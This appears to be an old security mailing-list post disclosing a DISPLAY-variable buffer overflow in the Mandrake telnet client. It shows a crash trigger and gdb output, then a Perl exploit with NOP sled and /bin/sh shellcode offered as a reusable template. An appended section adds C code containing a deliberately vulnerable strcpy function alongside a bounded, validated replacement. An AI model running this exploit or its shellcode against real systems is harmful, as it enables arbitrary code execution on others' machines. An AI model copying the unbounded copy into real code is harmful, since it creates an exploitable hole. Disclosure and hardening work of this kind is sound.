Hi,
As the distro becomes more stable I want to see some exploitable security
holes. The first one that works with Mandrake is a telnet overflow bug:
export DISPLAY=`perl -e 'print "A"x2000'`
[root@localhost /root]# telnet localhost
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
Segmentation fault (core dumped)
Not good. Now using gdb:
Core was generated by `telnet localhost'.
Program terminated with signal 11, Segmentation fault.
#0 0x400bd621 in ?? ()
(gdb) info all-registers
eax 0x806a238 134652472
ecx 0x41413681 1094792833
edx 0x4014bfe0 1075101664
ebx 0x4014d8e0 1075108064
esp 0xbfffcd04 0xbfffcd04
ebp 0xbfffcd5c 0xbfffcd5c
esi 0x8069bb8 134650808
edi 0x100000 1048576
eip 0x400bd621 0x400bd621
eflags 0x10286 66182
So eip is successfully overwritten ;-)
Thus arbitrary code could be spawned.
So this is a Perl script that should automate this (but since telnet is not running
with a lot of privilege I haven't found any serious problems).
If someone does, tell me ;-)
This is a Perl script that tries to change environment variables via this bug:
#!/usr/bin/perl
# Generic exploit program in perl, which clears the environment to take
# away the need for offset guessing.
$egg = "\x90" x 1500;
$egg .="\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76";
$egg .= "\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b";
$egg .= "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff";
$egg .= "\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff";
$egg .= "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02";
$egg .= "\x02\x02\x02/bin/sh.-c.sh";
foreach $key (keys %ENV) {
delete $ENV{$key};
}
$buf="";
for ($i = 0; $i < 2000; $i++) {
$buf .= "\x01\xda\xbf\xbf";
}
# Put here your use for $buf, the string to exploit the vulnerable program
# with
$ENV{"DISPLAY"} = $buf;
$ENV{"egg"} = $egg;
system("/usr/bin/telnet localhost");
printf("Exploit done\n");
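The defender's side of the overflow above, as an added example that is not the poster's code and not the Mandrake telnet source. It assumes the bug is an unbounded copy of the DISPLAY environment variable into a fixed-size stack buffer (the register dump, with 'A' bytes in ecx and a garbage eip, is consistent with that, but the post does not show telnet's source); the DISPLAY_MAX limit, the function names and the character whitelist are assumptions made for the illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed, not from the post: a generous upper bound for a DISPLAY value such as
 * "hostname:0.0". Real values are a few dozen bytes at most. */
#define DISPLAY_MAX 256

/* Vulnerable pattern (assumed shape of the bug the post triggers; not the real
 * telnet source). The environment is caller-controlled, so an unbounded strcpy of
 * $DISPLAY into a fixed stack buffer lets a 2000-byte value overrun the saved
 * registers and return address. Kept only as the "before"; nothing below calls it. */
void vulnerable_set_display(const char *env_display) {
    char buf[128];
    if (env_display == NULL)
        return;
    strcpy(buf, env_display);   /* no length check: overflow on long input */
    (void)buf;
}

/* Accept only characters that legitimately occur in "host:display.screen" style
 * values (ASCII letters, digits, ':', '.', '-', '_' and '/' for socket paths). */
static int display_char_ok(unsigned char c) {
    if ((c >= '0' && c <= '9') || (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z'))
        return 1;
    return c == ':' || c == '.' || c == '-' || c == '_' || c == '/';
}

/* Hardened version: measure against the destination size before copying, reject
 * values that would not fit (including the terminating NUL) or that contain
 * unexpected characters, then copy with an explicit bound.
 * Returns 0 on success and -1 if the value is rejected; out is untouched on -1. */
int safe_set_display(const char *env_display, char *out, size_t outlen) {
    size_t len = 0;
    if (env_display == NULL || out == NULL || outlen == 0)
        return -1;
    /* Bounded scan: stop as soon as the value is provably too long. */
    while (len < outlen && env_display[len] != '\0') {
        if (!display_char_ok((unsigned char)env_display[len]))
            return -1;
        len++;
    }
    if (len >= outlen)               /* no room for the NUL terminator */
        return -1;
    memcpy(out, env_display, len + 1);
    return 0;
}

/* Convenience wrapper with a DISPLAY_MAX-sized buffer: 0 if accepted, -1 if not. */
int check_display_value(const char *value) {
    char buf[DISPLAY_MAX];
    return safe_set_display(value, buf, sizeof buf);
}

/* Builds a constructed value of n 'A' bytes (the same shape as the post's
 * perl -e 'print "A"x2000') and reports whether the hardened check accepts it. */
int check_oversized_display(size_t n) {
    char *value = malloc(n + 1);
    int rc;
    if (value == NULL)
        return -1;
    memset(value, 'A', n);
    value[n] = '\0';
    rc = check_display_value(value);
    free(value);
    return rc;
}

int main(void) {
    char display[DISPLAY_MAX];
    /* Reads the real environment, as the telnet client would. */
    if (safe_set_display(getenv("DISPLAY"), display, sizeof display) == 0)
        printf("DISPLAY accepted: %s\n", display);
    else
        printf("DISPLAY missing or rejected; continuing without it\n");
    printf("2000 x 'A' -> %s\n",
           check_oversized_display(2000) == 0 ? "accepted" : "rejected");
    return 0;
}
```

The point of the check is that anything read with getenv() is input chosen by whoever starts the process, so it gets the same bound-then-copy treatment as network input; a value that is too long is rejected before any copy happens, rather than truncated after the buffer has already been overrun.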